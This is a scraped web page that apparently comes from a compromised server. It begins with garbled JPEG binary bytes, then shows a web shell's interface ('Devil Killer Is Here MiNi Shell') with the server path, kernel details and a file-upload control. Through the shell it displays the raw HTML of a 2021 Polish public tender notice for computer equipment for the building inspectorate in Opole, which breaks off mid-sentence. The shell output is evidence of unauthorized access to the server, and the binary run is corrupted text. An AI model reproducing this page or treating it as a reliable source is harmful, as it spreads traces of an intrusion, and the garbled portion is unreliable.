JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211019/0023640203-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu komputerowego i oprogramowania dla Wojewódzkiego Inspektoratu Nadzoru Budowlanego w Opolu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WOJEWÓDZKI INSPEKTORAT NADZORU BUDOWLANEGO W OPOLU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531502621</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ozimska 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-057</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">774531884</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro.projekt@winb.opole.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">winbopole.bip.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu komputerowego i oprogramowania dla Wojewódzkiego Inspektoratu Nadzoru Budowlanego w Opolu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bc5d574c-300b-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00236402</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">03</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00021736/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa sprzętu komputerowego i oprogramowania – część realizowana w 2021r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Pomoc techniczna” Programu Operacyjnego Infrastruktura i Środowisko 2014 – 2020” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym <br/>a Wykonawcami odbywa się elektronicznie (za pomocą środków komunikacji elektronicznej) przy użyciu:<br/>1.1. miniPortalu pod adresem: https://miniportal.uzp.gov.pl/<br/>1.2.Elektronicznej Skrzynki Podawczej Zamawiającego: /WINBOPOLE/skrytkaESP znajdującej się na platformie ePUAP pod adresem https://epuap.gov.pl/wps/portal<br/>1.3.poczty elektronicznej pod adresem: biuro.projekt@winb.opole.pl<br/>1.4.strony właściwej dla danego postępowania https://miniportal.uzp.gov.pl/<br/>2. W niniejszym postępowaniu komunikacja między Wykonawcami a Zamawiającym będzie prowadzona przy pomocy poczty elektronicznej, minportalu (Formularz do komunikacji), oraz elektronicznej skrzynki podawczej – ePUAP (dedykowany formularz).<br/><br/>2. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w:<br/>2.1. na miniPortalu: w Instrukcji użytkownika znajdującej się pod adresem: https://miniportal.uzp.gov.pl/Instrukcje<br/>2.2. Regulaminie ePUAP pod adresem: https://epuap.gov.pl/wps/portal .<br/>2.3. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB. Maksymalny rozmiar maila (razem z załącznikami) nie może przekraczać 20 MB.<br/><br/>3.Do złożenia oferty oraz innych dokumentów w postępowaniu uprawnieni przedstawiciele Wykonawcy muszą dysponować kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.<br/><br/>4. Ofertę można złożyć na dwa sposoby:<br/>4.1. przez miniPortal,<br/>4.2. przez ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BOF.272.6.1.2021.AR</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest dostawa sprzętu komputerowego <br/>i oprogramowania dla Wojewódzkiego Inspektoratu Nadzoru Budowlanego <br/>w Opolu wraz z przeniesieniem na Zamawiającego własności ww. sprzętu komputerowego i oprogramowania.<br/><br/>2. Przedmiot zamówienia został podzielony na dwie części:<br/>część I zamówienia: dostawa sprzętu komputerowego i oprogramowania obejmująca dostawę:<br/> - laptopa 14” – 6 szt.,<br/>- torby na laptop 14” – 6 szt.,<br/>- dedykowanej stacji dokującej do laptopa z zasilaczem – 6szt.,<br/>- uniwersalnej stacji dokującej USB-C z zasilaczem – 5 szt.,<br/>- dedykowany zestaw bezprzewodowy: klawiatura i mysz – 13 szt.,<br/>- uchwyt na 2 szt. monitorów – 11 szt.,<br/>- monitor 27 cali – 22szt.,<br/>- program Microsoft Office 2019 dla Użytkowników Domowych i Małych Firm (lub nowszy) lub równoważny – 7 szt.,<br/>- komputer stacjonarny – 1 szt.,<br/>- monitor LCD z podświetlaniem LED 22” – 2 szt.,<br/>- słuchawki z mikrofonem nauszne – 16 szt.,<br/>- skaner dokumentów – 1 szt.,<br/>- dyski ssd – 2 szt.,<br/>- uniwersalny zasilacz do replikatorów portów – 6 szt.,<br/><br/><br/>3. Sprzęt wskazany w części I ma być sprzętem fabrycznie nowym <br/>i nieużywanym, spełniającym wymagania określone w Załączniku nr 1 do SWZ - OPZ.<br/><br/>4. Zamawiający wymaga aby każdy oferowany sprzęt elektroniczny wskazany <br/>w części I:<br/>1)posiadał certyfikat jakości ISO 9001 i ISO 14001 dla producenta urządzenia (sprzętu elektronicznego),<br/>2)posiadał deklarację zgodności CE dla każdego urządzenia.<br/><br/>5. Miejscem realizacji przedmiotu zamówienia dla części I jest siedziba Zamawiającego w Opolu, przy ul. Ozimskiej 19, 45-057 Opole. <br/><br/>6. Przedmiot zamówienia w zakresie dostawy sprzętu komputerowego <br/>i oprogramowania dla Wojewódzkiego Inspektoratu Nadzoru Budowlanego w Opolu w zakresie części I dla: <br/>- laptopa 14” – 6 szt.,<br/>- torby na laptop 14” – 6 szt.,<br/>- dedykowanej stacji dokującej do laptopa z zasilaczem – 6szt.,<br/>- uniwersalnej stacji dokującej USB-C z zasilaczem – 1 szt.,<br/>- dedykowany zestaw bezprzewodowy: klawiatura i mysz – 7 szt.,<br/>- uchwyt na 2 szt. monitorów – 7 szt.,<br/>- monitor 27 cali – 14 szt.,<br/>- program Microsoft Office 2019 dla Użytkowników Domowych i Małych Firm (lub nowszy) lub równoważny – 6 szt.,<br/>- słuchawki z mikrofonem nauszne – 16 szt.,<br/>- skaner dokumentów – 1 szt.,<br/>- dyski ssd – 2 szt.,<br/>- uniwersalny zasilacz do replikatorów portów – 6 szt.,<br/> <br/> jest realizowany w ramach projektu „Plan Działań nadzoru budowlanego na lata 2021-2023 o numerze POIS.10.01.00-00-0700/21, w ramach Działania 10.1 oś priorytetowa X „Pomoc techniczna” Programu Operacyjnego Infrastruktura i Środowisko 2014 – 2020”<br/><br/><br/>7. Szczegółowy opis przedmiotu zamówienia (OPZ) zawierają załączniki <br/>1) Załączniku nr 1 do SWZ – Opis przedmiotu zamówienia.<br/>2) Załączniku nr 2 do SWZ – Wzór Formularza oferty.<br/>3) Załączniku nr 3 do SWZ – Wzór umowy wraz z załącznikami dla części I.<br/>4) Załącznik nr 4 do SWZ - Opis równoważności oprogramowania Microsoft Office 2019 dla Użytkowników Domowych i Małych Firm (lub nowszy).<br/>5) Załączniku nr 6 do SWZ -Wydajność procesora wg strony www.cpubenchmark.nethigh_end_cpus.html.<br/>6) Załączniku nr 7 do SWZ – Wydajności karty graficznej wg strony Passmark. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30195800-0 - Szyny lub uchwyty do zawieszania</p> <p class="mb-0">30213100-6 - Komputery przenośne</p> <p class="mb-0">30213300-8 - Komputer biurkowy</p> <p class="mb-0">30216110-0 - Skanery komputerowe</p> <p class="mb-0">30231310-3 - Wyświetlacze płaskie</p> <p class="mb-0">30233132-5 - Napędy dyskowe</p> <p class="mb-0">30237000-9 - Części, akcesoria i wyroby do komputerów</p> <p class="mb-0">30237200-1 - Akcesoria komputerowe</p> <p class="mb-0">30237270-2 - Torby na komputery przenośne</p> <p class="mb-0">30237280-5 - Akcesoria zasilające</p> <p class="mb-0">30237410-6 - Myszka komputerowa</p> <p class="mb-0">30237460-1 - Klawiatury komputerowe</p> <p class="mb-0">32342100-3 - Słuchawki</p> <p class="mb-0">48300000-1 - Pakiety oprogramowania do tworzenia dokumentów, rysowania, odwzorowywania, tworzenia harmonogramów i produkowania</p> <p class="mb-0">48624000-8 - Pakiety oprogramowania dla systemów operacyjnych komputerów osobistych (PC)</p> <p class="mb-0">72268000-1 - Usługi dostawy oprogramowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najwyżej ocenioną zostanie uznana oferta, która uzyska<br/>najwyższą liczbę<br/>punktów spośród ofert podlegających ocenie w każdej z części postępowania, wyliczoną zgodnie ze wzorami określonymi w XXIII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest dostawa sprzętu komputerowego <br/>i oprogramowania dla Wojewódzkiego Inspektoratu Nadzoru Budowlanego <br/>w Opolu wraz z przeniesieniem na Zamawiającego własności ww. sprzętu komputerowego <br/>i oprogramowania.<br/>1.2.Przedmiot zamówienia został podzielony na dwie części:<br/> część II zamówienia: dostawa urządzeń drukujących obejmująca dostawę:<br/>- urządzenia wielofunkcyjnego A3 – 1 szt.,<br/><br/>Załącznikiem do Protokołu Odbioru Końcowego będzie przekazany przez Wykonawcę Zamawiającemu login i hasło do urządzenia zapewniającego Zamawiającemu samodzielne administrowanie urządzeniem.<br/><br/>- drukarka ploter kolorowy 24” – 1 szt.<br/><br/><br/>2. Sprzęt wskazany w części II ma być sprzętem fabrycznie nowym <br/>i nieużywanym, spełniającym wymagania określone w Załączniku nr 1 do SWZ - OPZ.<br/><br/>3. Zamawiający wymaga aby każdy oferowany sprzęt elektroniczny wskazany <br/>w części II:<br/>1)posiadał certyfikat jakości ISO 9001 i ISO 14001 dla producenta urządzenia (sprzętu elektronicznego),<br/>2)posiadał deklarację zgodności CE dla każdego urządzenia.<br/><br/>4. Miejscem realizacji przedmiotu zamówienia dla części II jest siedziba Zamawiającego w Opolu, przy ul. Ozimskiej 19, 45-057 Opole. <br/><br/>5. Przedmiot zamówienia w zakresie dostawy sprzętu komputerowego <br/>i oprogramowania dla Wojewódzkiego Inspektoratu Nadzoru Budowlanego w Opolu <br/>w zakresie części II dla: <br/>- drukarki ploter kolorowy 24” – 1 szt.<br/> jest realizowany w ramach projektu „Plan Działań nadzoru budowlanego na lata 2021-2023 o numerze POIS.10.01.00-00-0700/21, w ramach Działania 10.1 oś priorytetowa X „Pomoc techniczna” Programu Operacyjnego Infrastruktura i Środowisko 2014 – 2020”<br/><br/><br/>6. Szczegółowy opis przedmiotu zamówienia (OPZ) zawierają załączniki <br/>1) Załączniku nr 1 do SWZ – Opis przedmiotu zamówienia.<br/>2) Załączniku nr 2 do SWZ – Wzór Formularza oferty.<br/>3) Załączniku nr 8 do SWZ – Wzór umowy wraz z załącznikami dla części II. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30120000-6 - Urządzenia fotokopiujące i do druku offsetowego</p> <p class="mb-0">30232140-7 - Plotery</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najwyżej ocenioną zostanie uznana oferta, która uzyska najwyższą liczbę <br/>punktów spośród ofert podlegających ocenie w każdej z części postępowania, wyliczoną zgodnie ze wzorami określonymi w XXIII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">PODMIOTOWE ŚRODKI DOWODOWE SKŁADANE NA WEZWANIE ZAMAWIAJĄCEGO<br/>1. WYKONAWCA.<br/>Zgodnie z pkt X SWZ, Zamawiający wezwie Wykonawcę, którego oferta została oceniona najwyżej, do złożenia odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonego nie wcześniej niż 3 miesiące przed jego złożeniem.<br/><br/>2. Zamawiający nie wezwie do złożenia dokumentu, o którym mowa w pkt. 1, jeżeli może go uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2021 r. poz. 670 ze zm.), o ile Wykonawca wskaże w oświadczeniu, o którym mowa w pkt IX SWZ dane umożliwiające dostęp do dokumentu lub załączy go do oferty.<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/><br/>3. WYKONAWCY WSPÓLNIE UBIEGAJĄCY SIĘ O UDZIELENIE ZAMÓWIENIA<br/>Dokument wymieniony powyżej w pkt. 1, każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, składa w swoim imieniu.<br/><br/>4. PODMIOTY ZAGRANICZNE<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 1, składa dokument właściwy w zakresie uregulowanym w § 4 Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. poz. 2415).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> DLA CZĘŚCI I:<br/>W przypadku zaoferowania oprogramowania równoważnego, w celu potwierdzenia zgodności oferowanego równoważnego oprogramowania z wymaganiami określonymi w załączniku nr 4 do SWZ (dotyczy części I), Zamawiający wymaga przedstawienia przedmiotowych środków dowodowych potwierdzających spełnianie wszystkich wymagań opisanych w załączniku nr 4 do SWZ.<br/><br/> Zamawiający dopuszcza następujące przedmiotowe środki dowodowe:<br/>- karty katalogowe oferowanego oprogramowania,<br/>- instrukcje,<br/>- lub inne dokumenty producenta, w tym dokumenty pozyskane ze stron internetowych producenta.<br/><br/>UWAGA:<br/>Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski.<br/><br/>Ww. przedmiotowe środki dowodowe (dotyczące części I) należy złożyć wraz <br/>z ofertą, z uwzględnieniem pkt XVII. 7 SWZ.<br/><br/>W przypadku, gdy oferowane oprogramowanie równoważne okaże się nierównoważne lub gdy oferowane oprogramowanie będzie niezgodne z opisem przedstawionym w ofercie – oferta zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Na podstawie art. 107 ust. 